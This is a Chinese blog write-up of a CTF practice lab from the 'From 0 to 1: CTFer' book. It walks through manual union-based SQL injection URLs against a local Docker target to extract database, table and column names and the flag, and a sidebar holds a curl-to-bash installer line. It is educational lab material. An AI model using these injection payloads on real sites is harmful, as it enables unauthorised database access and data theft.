《从0到1:CTFer成长之路》靶场练习手记02

最新推荐文章于 2024-06-09 10:39:10 发布
最新推荐文章于 2024-06-09 10:39:10 发布
阅读量4.2k 收藏 1
点赞数
文章标签: ubuntu 运维 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/X_python321/article/details/123362440
版权

靶场环境win10+VM+ubuntu+docker

靶场环境搭建见笔者上篇手记

《从0到1:CTFer成长之路》靶场练习手记_X_python321的博客-CSDN博客

注意事项

Ubuntu里面开了多个docker-compose的时候会生成虚拟网卡地址

容器ID可以使用docker ps -a查看,根据下面命令查看具体IP

docker inspect 容器ID | grep IPAddress

docker-compose起来之后使用浏览器访问IP地址

火狐浏览器使用hackebar插件进行手注

 

http://172.20.0.1/index.php?id=1' and 1=2 -- -

 

http://172.20.0.1/index.php?id=-1' union select 1,2,3  -- -

 爆库

http://172.20.0.1/index.php?id=-1' union select 1,database(),3  -- -

 爆表

http://172.20.0.1/index.php?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='note' -- -

爆列

http://172.20.0.1/index.php?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='fl4g' -- -

 爆值

http://172.20.0.1/index.php?id=-1' union select 1,group_concat(fllllag),3 from fl4g  -- -

 

 

以上SQL手工注入wp

嫌麻烦的同学可以交给热心的 sqlmap 一把梭

3ize0f
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
《从0到1:CTFer成长》粗心的小李
tr_trTTT的博客
04-02 2885
前言: 我是CTF小白,创建此文章只为了记录自己学习的进度 题目: 我们先进入环境 这边给了提示,是吧git放到了外网环境,直接扫一下目录吧,查找一下git目录 git目录下是有东西的 所以我们可以利用工具GitHack或者Git_Extract-master把泄露的内容下载下来 下载下来的文件就会在这边 直接打开就可以看到flag n1book{git_looks_s0_easyfun} ...
sqli-labs靶场练习笔记
11-09
sqli-labs靶场练习笔记,里面有2关 3关 4关 5关 4关 7关 8关 9关 11关 12关 13关 14关 15关 16关 17关 18关 19关 20关 21关 22关 23关 24关 的练习内容,可以供给初学sql注入的学者参考
《从0到1:CTFer成长》afr_3
ZhShy
01-16 1072
文章目录靶场:afr_3知识点解题过程flag:n1book{afr_3_solved} 靶场:afr_3 知识点 /proc目录 flask之ssti模板注入 flask-session-cookie-manager burpsuite抓包 解题过程 检查首页,在输入框随便输入,并根据引导进入下一个页面 查看URL: http://9ba2d619-5c5e-4585-ab9e-9dc74f397e14.node4.buuoj.cn:81/article?name=article 通过
《从0到1:CTFer成长靶场练习手记
X_python321的博客
03-07 1158
第一章 web入门 环境:主机Win10+VM 12 pro+Ubuntu 20 VM安装包链接 链接:https://pan.baidu.com/s/159zcAsCSctaz_TmrrEribg 提取码:riiq licence可自行百度 Ubuntu 的镜像可以从阿里的开源镜像站下载 阿里巴巴开源镜像站-OPSX镜像站-阿里云开发者社区 注意事项1:VM安装Ubuntu的时候选择配置尽量大一点,笔者第一次安装时选择的配置是1G内存 1核 1处理器(这个是安装时系统默认推荐的配置),可以正
超详细,手把手教你打造CTF动态靶场,零基础入门到精通,收藏这一篇就够了
最新发布
Python_paipai的博客
06-09 626
想搞一个CTF比赛,需要一个竞赛靶场,于是这个任务就落在了我的身上,平台是利用CTFd框架,基于docker搭建的动态靶场,搭建过程中遇到的坑比较多,这里我会把每一个遇到的坑都指出来。我搭建的是CTFd的3.X的版本。
从0到1——CTFer成长(一)
youngerll的博客
03-08 3973
这里写自定义目录标题从0到1——CTFer成长(一)Docker安装 从0到1——CTFer成长(一) 此书将习题放在docker上,想做习题要先布置docker环境。 Docker安装 Windows商业版可以直接安装,懒得做系统,家庭版可以在VM虚拟机中直接安装。 下载ubuntu20系统及VM15; 安装docker。 ubuntu系统安装: 1.选择英语可以避免后期安装软件改文径名称。 2.接着是漫长的等待; 3.等待完,右键桌面打开终端。 4.docker安装 ①终端apt
从0到1:CTFer成长(新手上)常见的收集
m0_64460448的博客
12-30 504
常见的信息收集
从0到1——CTFer成长(四)
youngerll的博客
03-09 645
从0到1——CTFer成长(四)反序列化漏洞thinkphp反序列化利用链python的安全问题python里的SSRFSSTI密码学及逆向知识Encrypted Flaskunsecure converter逻辑漏洞逻辑漏洞 第三章 web进阶 反序列化漏洞 thinkphp反序列化利用链 python的安全问题 python里的SSRF SSTI 密码学及逆向知识 Encrypted Flask unsecure converter 逻辑漏洞 逻辑漏洞 ...
网络靶场:从专业赋能到实战攻防-赛博空间的对抗与演进.pdf
08-08
网空疆域的“摩擦”和影响从网络世界延展到现实世界,网络靶场从高级网安人才的专业赋能出发,通过体系化的规划、学习、演练、对抗,在实战仿真中积累经验、技术、战法,培养精英人才。打通从实战仿真到实战的壁垒,...
web渗透教程1:pikachu靶场搭建
11-17
带你手把手搭建pikachu靶场环境
Flask_Bug_Platform:Flask代码审核练习靶场,初始代码源自https
03-22
Flask_Bug_Platform Flask代码审核练习靶场,初始代码源自
vulnhub靶场库中 DC:1
07-06
1. **Vulnhub靶场库与DC:1介绍** Vulnhub是一个在线资源库,提供了一系列虚拟机镜像,这些镜像设计为安全学习和实践平台,尤其是对于网络安全初学者。DC:1是Vulnhub靶场库中的一个特定靶机,它旨在帮助用户学习和...
从0到1CTFer成长-第一章-任意文件读取漏洞
黑白的博客
03-01 1308
任意文件读取漏洞 声明 好好向大佬们学习!!! 攻击 afr_1 kali执行 vim docker-compose.yml 内容如下 version: '3.2' services: web: image: registry.cn-hangzhou.aliyuncs.com/n1book/web-information-backk:latest ports: - 80:80 开启docker docker-compose up -d 访问80 http://192.
从0到1:CTFer成长docker环境搭建
iuyoo的博客
04-17 1492
1. 安装 docker 使用官方安装脚本安装 sudo curl -fsSL https://get.docker.com | bash -s docker --mirror Aliyun 也可以使用国内 daocloud 一键安装命令: sudo curl -sSL https://get.daocloud.io/docker | sh 由于之前使用了 snap 安装过 docker,运行 docker 命令出现: bash:/snap/bin/do...
ctf从0到1
mingyqf的博客
02-28 1830
网站链接: https://www.ichunqiu.com/battalion?t=1&r=68487 举足轻重的信息搜集 第一题:常见的搜集 进入环境,用dirsearch扫一下,发现存在vim备份文件,gedit备份文件和robots.txt文件。 robots.txt直接访问,发现flag1_is_her3_fun.txt,直接访问发现了flag1。 index.php~直接访问,发现flag2。 直接访问.index.php.swp,把vim备份文件下载下来,然后vim -r inde
搭建一个ctf_CTF丨从零开始搭建WEB Docker靶场
weixin_39770626的博客
11-04 853
第十二届全国大学生信息安全竞赛即将开始,小伙伴们有报名参加的吗?大家在比赛前是否开始进行模拟演练了?今天,i春秋将与大家分享靶场搭建的相关内容,帮助大家更好的进行实操演练。学习搭建Docker靶场之前,我们先了解一下为什么要用Docker?相对于虚拟机,Docker启动更快。成本考虑更安全环境部署搭建环境>>OS: Ubuntu 16.04设备类型: VM宿主机:ESXI 6.5卸载原...
从0到1ctfer成长配套逆向题 babyalgo
qq_35576225的博客
11-05 487
题目来源:https://book.nu1l.com/tasks/#/pages/reverse/5.4 1.找到main函数,反编译并修改相应的变量名和变量类型后得到如下结果 __int64 __fastcall main(__int64 a1, char **a2, char **a3) { __int64 result; // rax signed int i; // [rsp+Ch] [rbp-E4h] char key[10]; // [rsp+10h] [rbp-E0h] ...
从0到1CTFer成长-第二章-SSRF漏洞
黑白的博客
03-01 737
SSRF漏洞 声明 好好向大佬们学习!!! 攻击 SSRF Training 摘自 https://book.nu1l.com/tasks/#/ 使用BUUCTF在线环境 https://buuoj.cn/challenges 访问 http://72b1f71b-d44d-4562-8bac-db517053ebc4.node3.buuoj.cn 还挺像素的,点了一圈都没用,也就intersting challenge能点,点击出现源码,其实大概一看,这里应该就是通过网页提交url获取flag的.
Web安全和渗透测试有什么关系?
Python_0011的博客
03-31 330
做渗透测试的一个环节就是测试web安全,需要明白漏洞产生原理,通过信息收集互联网暴露面,进行漏洞扫描,漏洞利用,必要时进行脚本自编写和手工测试,力求挖出目标存在的漏洞并提出整改建议,当然如果技术再精一些,还要学习内网渗透(工作组和域环境),白盒审计,app,小程序渗透那些了......可以说是最科学最系统的学习线,大家跟着这个大的方向学习准没问题。当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。总之,web安全包含于渗透测试,但不是渗透测试的全部。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值